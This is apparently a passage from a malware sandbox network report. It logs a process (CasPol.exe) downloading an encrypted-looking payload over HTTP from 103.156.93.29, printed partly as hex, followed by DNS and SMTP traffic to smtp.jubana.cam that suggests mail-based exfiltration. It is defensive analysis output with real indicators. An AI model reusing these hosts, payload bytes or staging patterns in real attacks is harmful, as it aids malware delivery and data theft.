                                                            Oct 5, 2022 09:36:18.262759924 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.262806892 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.262852907 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.262900114 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.262945890 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.262991905 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263039112 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263084888 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263122082 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.263139009 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263173103 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.263207912 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263259888 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263274908 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.263328075 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263376951 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263422966 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263468981 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263482094 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.263536930 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263580084 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.263593912 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263653994 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263659954 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.263719082 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263767958 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263814926 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263837099 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.263879061 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263890982 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.263947964 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.263967037 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264014959 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264044046 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264079094 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264128923 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264169931 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264182091 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264244080 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264245033 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264307976 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264326096 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264374971 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264395952 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264441967 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264492035 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264520884 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264549971 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264575005 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264616966 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264647007 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264678955 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264719963 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264734983 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264791012 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264838934 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264846087 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264899015 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.264904976 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264962912 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.264988899 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.265024900 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.265079021 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.265088081 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.265146017 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.265196085 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.265196085 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.265256882 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.265263081 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.265311956 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.265322924 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.265379906 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.265412092 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.265436888 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.265489101 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.265530109 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.265542984 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.265583038 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.265655994 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.265737057 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.503741026 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.503832102 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.503895044 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.503928900 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.503969908 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504009962 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504055023 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504064083 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504133940 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504163027 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504210949 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504226923 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504292965 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504297972 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504369974 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504379988 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504446983 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504493952 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504509926 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504545927 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504585028 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504627943 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504650116 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504689932 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504722118 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504781961 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504827023 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504842997 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504873991 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.504921913 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.504942894 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505000114 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505023956 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505078077 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505135059 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505158901 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505207062 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505211115 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505279064 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505285025 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505352974 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505367994 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505429029 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505475044 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505491018 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505527020 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505567074 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505608082 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505633116 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505690098 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505697966 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505764961 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505817890 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505825043 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505863905 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505904913 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.505942106 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.505975962 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.506023884 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.506041050 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.506105900 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.506139994 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.506174088 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.506202936 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.506251097 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.506267071 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.506325960 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.506347895 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.506402016 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.506459951 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.506486893 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.506530046 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.506589890 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.506609917 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.506668091 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.506690025 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.506745100 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:18.506815910 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.506896019 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:18.506979942 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:36:22.812556028 CEST8049837103.156.93.29192.168.11.20
                                                            Oct 5, 2022 09:36:22.812763929 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:37:52.134711981 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:52.297772884 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:52.297945023 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:54.844677925 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:54.845031023 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:55.007265091 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:55.007831097 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:55.009535074 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:55.174710989 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:55.175170898 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:55.342622995 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:55.343780994 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:55.508804083 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:55.509232044 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:55.710845947 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:55.722536087 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:55.722939014 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:55.885507107 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:55.886796951 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:55.889091969 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:55.889187098 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:55.889202118 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:55.889211893 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:37:56.051968098 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:56.052031994 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:56.190964937 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:37:56.235407114 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:38:06.795648098 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:38:07.389282942 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:38:08.560883999 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:38:10.904270887 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:38:15.574866056 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:38:24.901133060 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:38:43.537630081 CEST4983780192.168.11.20103.156.93.29
                                                            Oct 5, 2022 09:39:31.808327913 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:39:31.972100019 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:39:31.972150087 CEST58749842208.91.199.224192.168.11.20
                                                            Oct 5, 2022 09:39:31.972286940 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:39:31.972346067 CEST49842587192.168.11.20208.91.199.224
                                                            Oct 5, 2022 09:39:32.134876013 CEST58749842208.91.199.224192.168.11.20
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 5, 2022 09:37:51.806405067 CEST5815153192.168.11.201.1.1.1
                                                            Oct 5, 2022 09:37:52.126144886 CEST53581511.1.1.1192.168.11.20
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 5, 2022 09:37:51.806405067 CEST192.168.11.201.1.1.10x2446Standard query (0)smtp.jubana.camA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 5, 2022 09:37:52.126144886 CEST1.1.1.1192.168.11.200x2446No error (0)smtp.jubana.camus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                            Oct 5, 2022 09:37:52.126144886 CEST1.1.1.1192.168.11.200x2446No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                            Oct 5, 2022 09:37:52.126144886 CEST1.1.1.1192.168.11.200x2446No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                            Oct 5, 2022 09:37:52.126144886 CEST1.1.1.1192.168.11.200x2446No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                            Oct 5, 2022 09:37:52.126144886 CEST1.1.1.1192.168.11.200x2446No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                            • 103.156.93.29
                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.11.2049837103.156.93.2980C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 5, 2022 09:36:17.067675114 CEST134OUTGET /GpqoIwsbfqqIcl84.xtp HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: 103.156.93.29
                                                            Cache-Control: no-cache
                                                            Oct 5, 2022 09:36:17.306513071 CEST135INHTTP/1.1 200 OK
                                                            Date: Wed, 05 Oct 2022 07:36:18 GMT
                                                            Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                            Last-Modified: Wed, 28 Sep 2022 08:15:43 GMT
                                                            ETag: "36240-5e9b85df9d67b"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 221760
                                                            Data Raw: d4 da 5b 58 38 b3 25 9d 73 53 41 5a 26 63 dd 55 99 b3 c9 65 4f af 0f 9b d4 48 2b 3b 1e a3 bc 88 f6 32 6e 83 36 36 d0 5b 72 84 97 24 1c 85 8d ba 7b 1f 91 f1 2b e0 7e d5 d0 bb 36 70 76 f2 ae 37 97 a3 aa 58 47 e8 9f f7 3a fc 07 12 d9 03 31 7e d9 47 24 05 19 14 79 e4 28 ae 59 06 3c 91 fb f7 3e f5 b8 48 0a d6 df 8b c6 26 20 e6 94 5f 5a 2a 17 f7 35 b4 45 16 f7 bb 2a 93 4d a2 a4 22 ee 22 eb 8a 90 2e 05 72 3d 11 d3 63 ac ef b9 a4 b7 b5 9e 61 9b 41 e7 72 cb bc 56 9b 06 8e a0 e8 c7 31 dd 00 3c 77 8c fd d1 2f c3 31 c9 3b a5 db 24 2c e4 44 e5 7f 09 16 d6 25 80 af 4c 42 33 d3 5b 58 40 9e 58 4d c6 00 3b 1f f7 42 98 25 24 64 52 48 50 a5 37 a5 4b 01 28 9e 7e 7a 66 ed 60 89 a4 c6 20 01 af b4 41 73 fd 9c 29 ff dd 41 c9 c6 3e 7e 29 40 39 5f 67 6f f5 6c ee 05 7d 09 6c 84 dc f9 c9 43 26 40 ff 31 a5 67 71 4d 7e a7 69 45 db 47 4f 18 9c df 0b 57 5b 15 8d f9 74 c0 9c e6 20 4c 80 d8 20 76 12 07 49 2a f4 db 13 36 b9 c1 26 e8 91 dc 71 b2 e6 10 86 2f f2 c0 ce 08 98 6f 64 ad f2 7b 14 e9 f7 8d bc 82 61 e5 ce 0d b3 43 78 c9 d3 a2 45 13 90 57 8b 57 ba 18 90 d5 ad 0c 93 e0 b9 85 4d ba 3a 35 2e d1 90 33 c3 68 06 7c 6f e1 b0 d5 4d 17 e2 bd 8b ca 2e ab 85 f4 34 50 47 df b6 80 c8 20 bf 78 87 60 63 91 6c e7 13 3a cd be eb ab 8c 56 e3 bb b2 60 5b 8d 23 d3 6a 54 04 d2 ab 96 a5 10 31 b8 c5 d9 37 29 28 3a 39 dc 5f 30 1b 13 dd 70 29 a7 49 22 83 33 b0 2e 33 23 fc 0a 72 28 58 21 d1 ea b7 fc 51 26 93 16 b9 8c c9 c9 b1 de ec e5 3e e8 95 5f 37 3c d6 9b 25 df ce 76 db 11 49 01 e6 0b 39 62 e1 b3 f3 fa 7b 69 4a 00 86 95 66 c2 12 a6 68 44 98 3f 21 b6 99 1d 83 22 17 a8 25 45 da 8a fc 2a dd e8 c7 7b 3b 97 87 7f d0 70 c9 6d d9 24 a5 e0 fd b1 31 e5 28 2d 78 5f 6b 38 54 c7 95 53 24 7d 01 47 cb 15 01 54 72 4b 69 6e df d3 33 ac 5d b8 d4 e3 ba fd 3b f2 e5 6c 2c e4 23 fa 0c 3f 8f ec 15 d2 11 7e b0 3e 47 03 0b 6d ac 22 2a 60 fc 3f d3 56 7d 83 58 bb e2 d0 f0 9e 7b 25 6c d3 3e 5a 92 c8 48 f6 d6 03 0e 33 67 8b 5a 96 73 8b 97 c0 36 9a 85 6c 61 19 53 d4 6f 40 0e 2b a5 99 12 d0 c8 b9 f6 7e 09 69 54 f6 76 b6 75 83 d6 f9 45 32 68 16 6f 47 70 83 f4 10 c4 c3 a0 55 e4 01 16 90 f8 bf 35 05 86 55 d4 47 4c 4e 80 1c 45 1c d6 77 b2 e4 c6 0a 09 8b fc 2f d3 75 33 72 3c bc 79 6d d1 a5 0c bd e8 06 fb 2a cf 10 44 fc d2 70 67 98 ce 2f 01 f2 bf 45 df 99 6a 2d 11 0f a4 e0 88 46 35 70 e0 1b a8 9f 16 2a 7d e9 49 0f c6 87 d2 48 2f 31 f5 9f 58 c9 cb 13 96 9f db ff 86 7a d2 54 f7 37 2c a2 12 99 dc 46 35 99 59 97 89 56 89 66 28 f0 93 dc a3 51 82 50 f6 f0 81 c6 e8 12 d7 fe 6f b5 4b 69 e1 a5 3b 11 a7 92 73 d0 73 25 39 ed 14 49 dd 1e 0e 3f 87 c4 a5 b4 5c 5a 26 8f f9 d8 c9 47 4c 0b 3a 6c 18 18 5a 7b 52 85 4f 17 c8 ab 17 d4 a3 b9 34 d1 f9 3d 40 ba e9 b3 f5 15 fe 2c f1 58 ff 31 7e 65 28 28 05 19 1e 53 f7 58 ac 59 2a 3c 91 fb f3 3e f5 a9 5e 01 fd c4 8b c1 31 de e7 b8 5d 42 21 17 f0 23 4a 44 3a f5 ac 21 93 4a ba da 23 c2 20 ce 97 01 c3 7b c2 34 dc f6 b4 a0 a3 74 8f c9 ce c7 10 bb 1f 95 1d ac cb 37 f6 37 fb ca ad b2 5e ae 37 a0 13 80 8d bc 4a e3 5f b1 e5 e0 b8 75 1b 82 2b 86 02 d9 1a f7 2d 8f ad 67 a1 31 d0 73 49 10 db 52 65 98 01 38 15 84 34 98 54 14 66 52 60 50 a5 37 a3 ab 01 3b 89 7e 50 76 ed 67 c6 59 c7 0c 0b b7 bf 41 74 eb 62 d6 a6 dc 56 c2 e6 39 66 d7 41 15 5d 4c 6d 9e 8f ec 0d 6e 09 6c 8c f6 ea fd 41 26 6c ff 31 a5 60 75 4d 6f b1 62 6e c0 47 48 cf 61 de 27 57 43 1e 8d fe 62 3e 9f ca 62 de 8b d8 37 6e ec 16 65 28 df d9 28 d5 69 d4 26 e8 93 f4 65
                                                            Data Ascii: [X8%sSAZ&cUeOH+;2n66[r${+~6pv7XG:1~G$y(Y<>H& _Z*5E*M"".r=caArV1<w/1;$,D%LB3[X@XM;B%$dRHP7K(~zf` As)A>~)@9_gol}lC&@1gqM~iEGOW[t L vI*6&q/od{aCxEWWM:5.3h|oM.4PG x`cl:V`[#jT17)(:9_0p)I"3.3#r(X!Q&>_7<%vI9b{iJfhD?!"%E*{;pm$1(-x_k8TS$}GTrKin3];l,#?~>Gm"*`?V}X{%l>ZH3gZs6laSo@+~iTvuE2hoGpU5UGLNEw/u3r<ym*Dpg/Ej-F5p*}IH/1XzT7,F5YVf(QPoKi;ss%9I?\Z&GL:lZ{RO4=@,X1~e((SXY*<>^1]B!#JD:!J# {4t77^7J_u+-g1sIRe84TfR`P7;~PvgYAtbV9fA]LmnlA&l1`uMobnGHa'WCb>b7ne((i&e
                                                            Oct 5, 2022 09:36:17.306626081 CEST136INData Raw: b2 f6 1a ac 3c c2 c2 ce 20 98 6f 64 a5 56 0e 06 ff ab a6 a7 82 66 72 33 0c cf 44 60 c2 d3 a5 53 ed 91 7b 89 40 b1 18 97 cd 53 0d bf e2 92 27 65 59 34 1d 3b d1 90 39 e9 7b 36 7e 6f a2 b0 d5 4d 1e e2 bd 9a dc 25 80 be f4 33 49 b9 de 9a 88 e0 21 bf
                                                            Data Ascii: < odVfr3D`S{@S'eY4;9{6~oM%3I!xJylVLaw!_gT1'>%*-zX*rbmEw!v~[+C~n_>A5a:<9ip>_?+:9:<N?VT\kmOcTk?B9
                                                            Oct 5, 2022 09:36:17.306694984 CEST138INData Raw: 73 74 50 9d 4e 3f 8b bf e9 d3 a7 9f 23 da f3 ba 57 44 e8 9b df 1b fc 07 18 0e b9 33 7e 67 6f 02 05 19 1e 51 c3 68 ae 53 86 2b 91 fb f3 4d dd b8 48 00 dc d9 9f 38 20 06 e6 94 59 29 03 17 f7 3f db 6f 16 f7 b1 2c 84 22 89 24 22 e4 24 c6 95 2a 20 05
                                                            Data Ascii: stPN?#WD3~goQhS+MH8 Y)?o,"$"$* xt;/&^$g?Xw=4'9MB3Zpn276A@RHZ]8of CsK>~#fGPgoD%}@C"h1m~eMiOIY%DUcy`v
                                                            Oct 5, 2022 09:36:17.306794882 CEST139INData Raw: 47 e8 86 0c 70 86 fa 35 f8 6e 7d 83 4b 65 e2 d0 da 9e 7b 25 6d fb 3e 5a 90 c8 31 f6 c0 8c 0e 39 67 8b 5a 96 71 8b ce c0 74 01 85 66 61 19 53 d4 6f 40 0e 2b 08 34 12 c2 d2 b9 f6 7f 12 59 51 f6 7f b5 5d 82 c3 f9 4f 09 74 3c 0e 43 70 89 8a 09 62 b0
                                                            Data Ascii: Gp5n}Ke{%m>Z19gZqtfaSo@+4YQ]Ot<Cpb_#^=UK#AeWFf\s$yg>6 8v$ gmnB?qbeILi^7T0C[$*[)QPEs\Y@>,qr2P(A%'[
                                                            Oct 5, 2022 09:36:17.544363976 CEST140INData Raw: d3 a2 4f 1f 82 55 f5 41 ba 18 94 fd d7 0c 93 ea 1b 2c 54 92 6f 37 2e d7 32 3a eb 13 06 7c 65 c9 9f d5 4d 11 3c d1 a3 fd 2e ab 8f dc 0c 50 47 d5 68 e0 b6 2e bf 78 83 79 50 c9 6b 99 04 3a cd ba c3 ee 8e 56 e5 93 e5 62 5b ab 4c ab 62 54 0e fa f1 94
                                                            Data Ascii: OUA,To7.2:|eM<.PGh.xyPk:Vb[LbT5:8Y]0;p)a{G~;#^"Y!QxKh7<=+c<9ho{C(fAD?`"EjTpmV(M"_k8S(}GAUrin3;l:
